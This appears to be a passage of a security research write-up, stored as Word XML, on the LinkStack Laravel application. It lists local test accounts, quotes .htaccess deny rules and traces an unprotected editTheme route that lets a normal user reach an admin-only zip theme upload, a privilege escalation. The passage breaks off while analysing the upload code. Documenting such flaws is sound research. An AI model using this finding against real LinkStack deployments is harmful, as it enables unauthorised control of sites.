        <w:t>https://linkstack.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2D98C" w14:textId="550CF714" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Here’s registered credentials for the ap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3FC" w14:paraId="43AFC14C" w14:textId="77777777" w:rsidTr="007D13FC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37622305" w14:textId="7626772F" w:rsidR="007D13FC" w:rsidRPr="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D13FC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE637A1" w14:textId="3C0BA619" w:rsidR="007D13FC" w:rsidRPr="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D13FC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CF0F9E5" w14:textId="722597C2" w:rsidR="007D13FC" w:rsidRPr="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D13FC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D13FC" w14:paraId="535B0557" w14:textId="77777777" w:rsidTr="007D13FC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48976B3B" w14:textId="627BB9F3" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>admin@localhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F9A27A" w14:textId="74FD16DE" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ADB1FAD" w14:textId="599C4C3B" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D13FC" w14:paraId="5C1C3BFB" w14:textId="77777777" w:rsidTr="007D13FC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E8BE1C" w14:textId="31F0E162" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>user1@localhost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CD21A68" w14:textId="589D6CBE" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>user1!@#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="134BC048" w14:textId="30388CDD" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>Normal User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D13FC" w14:paraId="539C4BD6" w14:textId="77777777" w:rsidTr="007D13FC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4236045E" w14:textId="7B3D3E12" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>user2@localhost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3005" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D52717A" w14:textId="21CB925E" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>user2!@#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3006" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ED81B4E" w14:textId="322C9F41" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC">
            <w:r>
              <w:t>Normal User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C7202E7" w14:textId="77777777" w:rsidR="007D13FC" w:rsidRDefault="007D13FC" w:rsidP="007D13FC"/>
    <w:p w14:paraId="4511BB56" w14:textId="692B76B4" w:rsidR="007D13FC" w:rsidRDefault="00066304" w:rsidP="00066304">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc183609107"/>
      <w:r>
        <w:t xml:space="preserve">Investigating </w:t>
      </w:r>
      <w:r w:rsidR="00197091">
        <w:t>The code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="5B90117A" w14:textId="066D7D4F" w:rsidR="00066304" w:rsidRDefault="00066304" w:rsidP="00066304">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00066304">
        <w:t xml:space="preserve">This application customizes the Laravel framework a bit. It </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00066304">
        <w:t>doesn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00066304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00066304">
        <w:t>t have a public folder, and the installation steps mention that all you need to do is extract the code into the web root, and it</w:t>
      </w:r>
      <w:r w:rsidRPr="00066304">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00066304">
        <w:t>s good to go. This might cause unintended behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B103EA6" w14:textId="0D1DFC17" w:rsidR="00066304" w:rsidRDefault="00066304" w:rsidP="00066304">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00066304">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="525CAF0F" wp14:editId="2CC357CF">
            <wp:extent cx="5731510" cy="1664335"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="195263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38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19C3" w14:textId="0C35CFD8" w:rsidR="00891986" w:rsidRDefault="00891986" w:rsidP="00891986">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00891986">
        <w:t xml:space="preserve">After checking the </w:t>
      </w:r>
      <w:r w:rsidRPr="00891986">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00891986">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00891986">
        <w:t xml:space="preserve"> file, there are a few restrictions on which files you're able to access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1EA011" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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# Restrict access to critical files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF8A23" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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FilesMat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"^\."&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79933202" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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Order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low,deny</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EF27A01" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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eny from all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573F34D4" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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FilesMatch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EDA9942" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"\.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>sqlite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>$"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13365691" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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rder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low,deny</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26A3A722" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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eny from all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F8E81" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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Files&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1ACBD2" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>"\.zip$"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510A12ED" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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Order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low,deny</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A84ED8F" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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eny from all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289A4A29" w14:textId="77777777" w:rsidR="00891986" w:rsidRDefault="008919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664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Files&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A4AC6" w14:textId="36E25FA2" w:rsidR="00891986" w:rsidRDefault="00891986" w:rsidP="00891986">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Its block access to any file start with dot(.), any file end with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.qlite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and .zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA12D8C" w14:textId="5236DB0F" w:rsidR="000F1521" w:rsidRDefault="000F1521" w:rsidP="000F1521">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000F1521">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">By default, Laravel logs any errors in a file located at </w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1521">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storage/logs/laravel.log</w:t>
      </w:r>
      <w:r>
        <w:t>` or `</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1521">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>storage/logs/YYYY-MM-DD-laravel.log</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="000F1521">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6330A31A" w14:textId="77777777" w:rsidR="000F1521" w:rsidRDefault="000F1521" w:rsidP="000F1521">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000F1521">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526ECD03" wp14:editId="7D46A198">
            <wp:extent cx="5731510" cy="1514475"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="28575"/>
            <wp:docPr id="196263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0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431E8" w14:textId="42E0FE60" w:rsidR="000F1521" w:rsidRDefault="000F1521" w:rsidP="000F1521">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00B330D0">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: welp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11552538" w14:textId="4ACD7F24" w:rsidR="00891986" w:rsidRDefault="00AF4E62" w:rsidP="000F1521">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Checking `</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4E62">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF4E62">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>routes.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>` we found that there are group of URLs available only for admin user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B568C90" w14:textId="1C50935F" w:rsidR="00AF4E62" w:rsidRDefault="00AF4E62" w:rsidP="00AF4E62">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF4E62">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A326200" wp14:editId="45899458">
            <wp:extent cx="3962953" cy="1219370"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19050"/>
            <wp:docPr id="154466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631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1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7A459" w14:textId="22A4F1CA" w:rsidR="00AF4E62" w:rsidRDefault="00AF4E62" w:rsidP="00AF4E62">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The route protected by ‘admin’ middleware, open up to check `</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4E62">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>app/Http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF4E62">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>Kernel.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA51F1A" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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33585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'admi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App\Http\Middleware\admin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CFC8CAC" w14:textId="50ABC6B6" w:rsidR="00AF4E62" w:rsidRDefault="00AF4E62" w:rsidP="00AF4E62">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The check is very straightforward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F4C0A" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> $requ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osure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> $n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FB509A0" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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3F31D6" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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67E277" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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check is admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67D5A8" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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Auth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()-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">role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dmin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7C737C" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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$n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reques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6733A4" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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4B34DB04" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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C30A62" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4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500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dir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dashboard'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6723AF3" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4E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3500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DF007A" w14:textId="77777777" w:rsidR="00AF4E62" w:rsidRDefault="00AF4E62" w:rsidP="00AF4E62">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF4E62">
        <w:t>Any ideas on how to bypass this?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> No luck?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BF1E6F" w14:textId="1FCC4E64" w:rsidR="00AF4E62" w:rsidRDefault="00AF4E62" w:rsidP="00AF4E62">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF4E62">
        <w:t>Let</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF4E62">
        <w:t>s look for functionalities that are meant for admins only but can somehow be triggered by a regular user.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113EA9F9" w14:textId="283A6A2E" w:rsidR="00767B65" w:rsidRDefault="00767B65" w:rsidP="00AF4E62">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00767B65">
        <w:t>In the file `</w:t>
      </w:r>
      <w:r w:rsidRPr="00767B65">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>resources/views/studio/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767B65">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>theme.blade.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767B65">
        <w:t>`, there</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00767B65">
        <w:t>s a check to see if the current user is an admin, and an additional form is displayed only for them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81BFD4" w14:textId="79879125" w:rsidR="00767B65" w:rsidRDefault="00767B65" w:rsidP="00767B65">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00767B65">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60D832A6" wp14:editId="1AF3809D">
            <wp:extent cx="5731510" cy="2221230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="129401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121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541E" w14:textId="77583443" w:rsidR="00767B65" w:rsidRDefault="00767B65" w:rsidP="00767B65">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00767B65">
        <w:t>The additional form appears to be sending a POST request to a route called `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767B65">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>editTheme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767B65">
        <w:t>`, and when we checked `</w:t>
      </w:r>
      <w:r w:rsidRPr="00767B65">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>routes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00767B65">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>web.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00767B65">
        <w:t>`, we found that this route isn</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00767B65">
        <w:t>t protected by the `</w:t>
      </w:r>
      <w:r w:rsidRPr="00767B65">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00767B65">
        <w:t>` middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACAD87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82135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Rou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po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/studio/them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UserControl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ditThe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)-&gt;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ditThe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B88931" w14:textId="4CE7646A" w:rsidR="00767B65" w:rsidRDefault="00E3116C" w:rsidP="00767B65">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E3116C">
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidRPr="00E3116C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E3116C">
        <w:t>ve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E3116C">
        <w:t xml:space="preserve"> just discovered our first privilege escalation vulnerability!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC7DC49" w14:textId="39CB13F4" w:rsidR="00767B65" w:rsidRDefault="00767B65" w:rsidP="00767B65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc183609108"/>
      <w:r>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="4CFCC535" w14:textId="1BE9287D" w:rsidR="00767B65" w:rsidRDefault="00767B65" w:rsidP="00DE73F3">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00767B65">
        <w:t>We should investigate this part of the code to see if we can exploit it further.</w:t>
      </w:r>
      <w:r w:rsidR="00DE73F3">
        <w:t xml:space="preserve"> This the code for `</w:t>
      </w:r>
      <w:r w:rsidR="00DE73F3" w:rsidRPr="00DE73F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE73F3" w:rsidRPr="00DE73F3">
        <w:rPr>
          <w:rStyle w:val="IntenseQuoteChar"/>
        </w:rPr>
        <w:t>editTheme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE73F3">
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02E18D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ditThe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quest $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93CEFE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78A7FC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validate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D153DA" w14:textId="365FEBC1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zip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ometimes|mimes:zi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 w:rsidR="00DE73F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A9BD9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2689C2E1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()-&gt;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E05ECB6" w14:textId="0181CC4D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ipf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zip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 w:rsidR="00DE73F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018201F5" w14:textId="0F6FC371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$the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the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$mess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79AF92" w14:textId="1CAC4A3A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whe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id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-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>update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8800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'theme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$theme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5251359A" w14:textId="0CD06FA6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emp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ip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 w:rsidR="00DE73F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> // [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10822C51" w14:textId="4EE6F0B3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ip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mo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s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/themes'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emp.zip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 w:rsidR="00DE73F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> [4]</w:t>
      </w:r>
